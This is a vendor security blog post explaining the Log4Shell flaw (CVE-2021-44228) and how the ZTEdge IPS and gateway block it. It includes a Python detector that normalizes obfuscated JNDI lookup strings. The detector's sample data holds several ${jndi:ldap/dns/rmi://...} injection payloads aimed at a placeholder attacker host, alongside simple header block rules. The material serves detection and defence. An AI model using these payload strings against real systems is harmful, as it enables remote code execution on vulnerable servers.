Posted on December 14, 2021
CVE-2021-44228 is an easily exploited vulnerability in Apache Log4j 2, a widely used Java logging library that developers of internet services and internet-connected products use to log data from their applications, including data that users provide. The flaw is in the library's JNDI lookup mechanism: when a string such as ${jndi:ldap://attacker-host/x} ends up in a logged message, vulnerable versions of Log4j 2 resolve the lookup, connect to the server named in it, and can load and execute Java code that the server returns. An attacker who can get such a string into any logged field (an HTTP User-Agent header, a username, a chat message) can therefore take full control of the server.
Every company that provides internet services or internet-connected products is at risk from this flaw if any of its Java applications logs attacker-controlled input through a vulnerable Log4j 2 version. Once in, attackers can gather data or even steal money. And cybercriminals are seizing the opportunity: since the vulnerability was revealed, attackers have been actively scanning the internet for vulnerable Log4j instances to exploit, and the volume is growing by the hour.
At the time of this writing, Apache has issued a second patch (Log4j 2.16.0) after a bypass (CVE-2021-45046) was discovered for the initial fix in 2.15.0; affected versions are Log4j 2.0-beta9 through 2.14.1, and 2.15.0 remains incompletely fixed. But since this vulnerability affects countless applications that are widely used by businesses and individual users, it is likely to remain unpatched, and actively exploited, in at least some systems for a long while.
For users of exploited applications, the news is grim: once the server of an internet service has been exploited, any user data on that company's servers may be exposed. And virtually every user relies on services that have already been exploited or still remain at risk of attack.
Given its impact on virtually every organization running Java workloads, CVE-2021-44228 is a particularly concerning vulnerability: it is easy to exploit from anywhere in the world and can do a great deal of damage. Fortunately, ZTEdge, Ericom Software's cloud-based SASE platform, provides organizations with several crucial defenses against Log4j exploits.
The ZTEdge platform's core Intrusion Prevention System (IPS) monitors all traffic flows from user to application for patterns that match malicious intent. For this vulnerability, that includes attackers scanning the internet for vulnerable Log4j instances, requests carrying a ${jndi:ldap://...} style lookup string intended to make the application fetch a malicious Java class from an attacker-controlled LDAP server, and attempts to move laterally inside an organization's network in search of applications that use Log4j.
When a potentially malicious event is detected, ZTEdge blocks it and stops the exploit in its tracks. Alerts may be issued, and details of the attempt, including when it occurred, the user involved and where they were located, are recorded for further investigation. Because the monitoring is delivered as a cloud service, organizations using ZTEdge receive this protection without having to patch or update the ZTEdge platform themselves. The IPS is a compensating control, however: any application still running a vulnerable Log4j version should be upgraded to a fixed release, since traffic that does not pass through the IPS is not covered.
ZTEdge engines are continually and automatically updated so that they detect the latest attack patterns. The ZTEdge security update for the Log4j vulnerability was available in the system within hours of the exploit being published.
ZTEdge users also benefit from the platform's defense-in-depth capabilities, with multiple security controls in place at different levels to mitigate attacks. In the case of CVE-2021-44228, besides the IPS protections discussed above, the ZTEdge Web Secure Web Gateway (SWG) can help prevent the vulnerability from being exploited. For instance, SWG application policies can be set to block requests whose User-Agent (or other) header contains the strings "jndi:ldap" or "jndi:dns", which stops the straightforward forms of the Log4j attack. Plain string rules like these do not catch obfuscated variants such as ${${lower:j}ndi:...}, URL-encoded payloads or other JNDI schemes such as rmi and ldaps, so they should be treated as one layer alongside the IPS signatures and updated as new variants appear.
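The following is an added example, not code from Ericom or from the Log4j project, that ties together the lookup mechanism described at the top of this post and the "jndi:ldap"/"jndi:dns" string rule just mentioned. It models, in a deliberately simplified way, how Log4j's string substitution resolves nested ${...} lookups from the inside out (only lower:, upper: and the ${name:-default} fallback are modelled; real Log4j also resolves env:, sys:, date: and more), and shows why a detector should normalize a header value the same way before matching on ${jndi:. The header values are constructed samples, not captured traffic, and 203.0.113.10 is an RFC 5737 documentation address used as a placeholder for an attacker host.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample HTTP header values (not captured traffic). The first is benign;
# the rest are the plain ${jndi:...} form plus the obfuscations seen in the wild:
# nested lower:/env:/::- lookups, other JNDI schemes, and URL encoding.
# 203.0.113.10 is from the RFC 5737 documentation range (placeholder attacker host).
SAMPLE_HEADERS: List[Tuple[str, str]] = [
    ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"),
    ("User-Agent", "${jndi:ldap://203.0.113.10:1389/a}"),
    ("X-Api-Version", "${jndi:dns://203.0.113.10/x}"),
    ("User-Agent", "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.10/a}"),
    ("Referer", "${${env:NOPE:-j}ndi:rmi://203.0.113.10/a}"),
    ("User-Agent", "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10/a}"),
    ("X-Forwarded-For", "%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D"),
]

# An innermost lookup: ${...} whose body contains no further "${" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def naive_match(value: str) -> bool:
    """The plain string rule described in the text; catches only the unobfuscated form."""
    return "jndi:ldap" in value or "jndi:dns" in value


def _resolve_one(body: str) -> Optional[str]:
    """Evaluate one innermost lookup body roughly as Log4j's substitution would.
    Returns None when the lookup must be kept in place (a jndi lookup, or an
    unresolvable one with no default); otherwise the text that replaces it."""
    if body.lower().startswith("jndi:"):
        return None
    name, default = (body.split(":-", 1) + [None])[:2]  # ${name:-default}
    prefix, _, arg = name.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    # env:, sys:, date:, ... and the empty name used by ${::-x}: an attacker picks
    # keys that are unset, so for detection we assume the default value is taken.
    # (Simplification: real Log4j would actually consult the environment here.)
    return default


def normalize(value: str, max_passes: int = 32) -> str:
    """URL-decode, then collapse nested lookups inside-out until only jndi (or
    unresolvable) lookups remain. max_passes bounds pathological inputs."""
    value = unquote(value)
    for _ in range(max_passes):
        changed = False

        def repl(m) -> str:
            nonlocal changed
            out = _resolve_one(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        value = INNERMOST.sub(repl, value)
        if not changed:
            break
    return value


def is_log4shell_probe(value: str) -> bool:
    """True when the value, after normalization, still carries a ${jndi:...} lookup."""
    return JNDI.search(normalize(value)) is not None


def scan_headers(headers: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (header name, normalized value) for every header carrying a JNDI lookup."""
    return [(name, normalize(v)) for name, v in headers if is_log4shell_probe(v)]


if __name__ == "__main__":
    for name, value in SAMPLE_HEADERS:
        print(f"{name:16} naive={naive_match(value)!s:5} "
              f"normalized={is_log4shell_probe(value)!s:5} {value}")
```

Run against the samples, the plain "jndi:ldap"/"jndi:dns" rule flags only two of the six malicious headers, while matching after normalization flags all six and leaves the benign User-Agent alone. The same idea applies on the application side: an allow-list on what may appear in logged fields, or removing the JndiLookup class from the Log4j jar, removes the attack surface regardless of how the string is encoded.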
Our team, and the ZTEdge platform itself, will continue to monitor and deploy CVE-specific security rules based on new attack variants for all of our customers. For customers looking for additional support, or if you are looking for protection from CVE-2021-44228, please contact us.